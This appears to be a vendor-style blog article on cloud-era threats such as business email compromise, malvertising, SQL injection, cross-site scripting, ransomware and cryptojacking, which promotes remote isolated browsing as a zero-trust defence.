According to the most recent Rightscale State of the Cloud survey, a staggering 91% of companies now use a public cloud implementation. Although this is a positive technological development, one can’t ignore the fact that for these companies, the traditional security perimeter no longer exists. They’re placing critical data and workloads on platforms that they don’t own, and they’re constantly transmitting these essentials back and forth along the public-facing internet.
The prevalence of the cloud means that security has changed. Infrastructure as a Service (IaaS) providers handle most traditional security tasks in the cloud, but individual organizations are responsible for things like password management. Rather than try to break into cloud provisioned services directly, many attackers now try to steal passwords from users, with credential theft increasing 98% since 2018. Even if the credentials only unlock an email account, the attackers can use info from the email account to unlock everything else.
In short, the corporate world has transitioned wholescale to the cloud. This has dramatically changed the landscape of threats and the ways in which people need to protect themselves. What’s more, although the changes have been dramatic, not many users are fully cognizant of the dangers that they face.
How Does Security Change in a Perimeter-less Era?
The advent of the cloud has given rise to new attacks while familiar attacks are evolving and becoming more difficult to detect. Here’s an updated threat catalog:
Phishing and BEC
When it comes to evolved cyber attacks, phishing scams are the tip of the spear. These no longer take the form of strangers from Nigeria asking for money – they now often involve what are known as business email compromise (BEC). These attacks aren’t used to just try to steal your login credentials. Rather, they target employees in accounts payable, posing as their CEO or a high-level customer. The attackers’ object is to fool users into wiring money to them directly. Not only is this form of attack effective, it’s also increased by 500% in the last year.
What about an attack where you don’t even have to open an email? Let’s say that you visit a site that has ads. The website isn’t in charge of placing the ad, and the ad agency doesn’t vet the ad before placing it. That means that hackers can design ads that contain malicious code. When you visit a site with a malicious ad, your browser downloads code from the ad and becomes infected. The attacker can track your browser history and intercept any information you transmit through it, including passwords.
Attackers have other ways to add malicious code to websites and infect users. If a website uses inputs like contact forms or login portals, it could be vulnerable. Instead of putting in a username or password, hackers will put SQL code into the login forms instead. This may cause the website to interpret the code as an instruction, allowing attackers to control the website remotely.
Hackers can use cross-site scripting to hurt you in two ways. By compromising a website that you visit, they can steal your login and session data or infect your browser. If they compromise a website or application that you host, they can steal your customers’ data. As such, cross-site scripting attacks are very dangerous – and they account for half of all attacks on web applications.
In all likelihood, you’ve heard of ransomware. Ransomware involves encrypting a user’s files. The user can’t use or recover these files while they’re encrypted, and must pay the attacker — usually in cryptocurrency — in order to have them restored. Cryptocurrency isn’t just bought and sold – it’s generated by essentially using large banks of computers to perform complex math equations. Generating (mining) cryptocurrency is quite expensive. The infrastructure currently used to legitimately mine cryptocurrency consumes more electricity than some small countries.
Here’s where cryptomining enters the fray. Rather than pay for all of the expensive infrastructure needed to mine cryptocurrency, hackers have decided to just steal it. By stealing the password to your public or private cloud, they can grab some of its computing resources and use them to mine cryptocurrency. What’s more, there’s no visible sign of compromise except for a slight slowdown of your applications, so you might not know you’ve been breached.
Ransomware is a huge issue and has been for years. The thing about cryptojacking, however, is that it’s growing faster than ransomware. One should arguably be as concerned about cryptojacking as ransomware attacks, especially because they’re part of a growing category of attacks that can hurt your business without ever leaving a sign that you’ve been breached.
How to Protect Yourself from New Malware
This list just scratches the surface of the various ills that can befall an unprepared organization – and the truth is that the new perimeter-less version of the internet make companies especially vulnerable. While your old moat-and-wall security systems may have blocked these breaches in the past, your users aren’t inside that perimeter anymore.
Imagine that one of your workers is working from a coffee shop. They aren’t inside your perimeter, and they aren’t inside your firewall. If they’re the victim of a drive-by-download, then their laptop – which is connected to your network – is now a vector for malware that can spread to your entire organization. Nothing is safe!
Hyperbole aside, literally nothing is safe – and your security posture should be based around that assessment.
Zero Trust Browsing
Zero trust browsing assumes that every website you visit is a potential phishing site that could either infect your endpoint with malware or attempt to harvest your credentials. As such, every website you visit needs to be screened for malicious activity – and isolated from your network.
Remote isolated browsing is the realization of the zero-trust browsing concept. Users browse the web as usual, via their standard device browser – but all rendering is done remotely by a virtual browser that is isolated in a container in the cloud or the DMZ, and only a clean media stream is sent to the device browser. At no point does code from the internet reach the user’s browser, yet the user experience is identical to unshielded browsing. And once the user closes their tab or stops browsing, the container, along with the virtual browser and all content — benign and malicious — is destroyed .
The only way to fully protect yourself from a chaotic internet is full isolation. If you assume that everywhere you visit is likely to be tainted by malware, you’ll be that much safer as a result.